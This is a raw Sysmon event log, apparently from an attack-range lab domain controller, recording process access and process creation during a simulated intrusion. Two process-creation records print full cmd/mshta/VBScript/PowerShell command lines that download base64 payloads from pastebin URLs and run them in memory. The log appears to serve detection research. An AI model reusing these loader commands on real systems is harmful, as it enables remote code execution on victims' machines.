08:01:01.540{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B4BD-615A-5102-00000000FC01}5448C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107166Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.540{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B4BD-615A-5102-00000000FC01}5448C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107165Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.518{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-B4BD-615A-5102-00000000FC01}5448C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107164Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.502{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B4BD-615A-5002-00000000FC01}4408C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107163Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.518{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-B4BD-615A-5102-00000000FC01}5448C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107162Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.502{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B4BD-615A-5002-00000000FC01}4408C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107161Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.502{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-4E02-00000000FC01}6168C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107160Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.486{58E9C193-ACA7-615A-1100-00000000FC01}360684C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-5102-00000000FC01}5448C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107159Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.486{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-5102-00000000FC01}5448C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107158Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.471{58E9C193-ACA7-615A-1100-00000000FC01}360684C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-5002-00000000FC01}4408C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107157Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.471{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-5002-00000000FC01}4408C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107156Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.439{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107155Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.439{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107154Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.424{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107153Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.424{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107152Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.424{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B4BD-615A-5102-00000000FC01}5448C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107151Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.424{58E9C193-B4B4-615A-4202-00000000FC01}40127184C:\Windows\System32\cmd.exe{58E9C193-B4BD-615A-5102-00000000FC01}5448C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\cmd.exe+f1e1|C:\Windows\System32\cmd.exe+11a37|C:\Windows\System32\cmd.exe+cb0d|C:\Windows\System32\cmd.exe+c295|C:\Windows\System32\cmd.exe+c347|C:\Windows\System32\cmd.exe+f916|C:\Windows\System32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107150Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.435{58E9C193-B4BD-615A-5102-00000000FC01}5448C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXEmshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/d46Ekc57').replace('$%%$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{58E9C193-B4B4-615A-4202-00000000FC01}4012C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/d46Ekc57').replace('$%$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 10341000x8000000000000000107149Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.403{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107148Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.403{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107147Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.403{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107146Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.403{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107145Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.403{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B4BD-615A-5002-00000000FC01}4408C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107144Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.403{58E9C193-B4B4-615A-3F02-00000000FC01}1085112C:\Windows\System32\cmd.exe{58E9C193-B4BD-615A-5002-00000000FC01}4408C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\cmd.exe+f1e1|C:\Windows\System32\cmd.exe+11a37|C:\Windows\System32\cmd.exe+cb0d|C:\Windows\System32\cmd.exe+c295|C:\Windows\System32\cmd.exe+c347|C:\Windows\System32\cmd.exe+f916|C:\Windows\System32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107143Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.416{58E9C193-B4BD-615A-5002-00000000FC01}4408C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXEmshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/H2JdYYVV').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{58E9C193-B4B4-615A-3F02-00000000FC01}108C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/H2JdYYVV').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 23542300x8000000000000000107142Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.372{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=81E324D20724E39F239BD58DC3EC8197,SHA256=8C29931FE0F51ED9415CE51F01A361252C4753309C27EACB6500EB3357FD3E8C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107141Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.355{58E9C193-ACA7-615A-1100-00000000FC01}360684C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-4F02-00000000FC01}3396C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107140Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.355{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-4F02-00000000FC01}3396C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107139Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.339{58E9C193-B4BD-615A-4F02-00000000FC01}33964128C:\Windows\system32\conhost.exe{58E9C193-B4BD-615A-4E02-00000000FC01}6168C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107138Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.324{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B4BD-615A-4F02-00000000FC01}3396C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107137Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 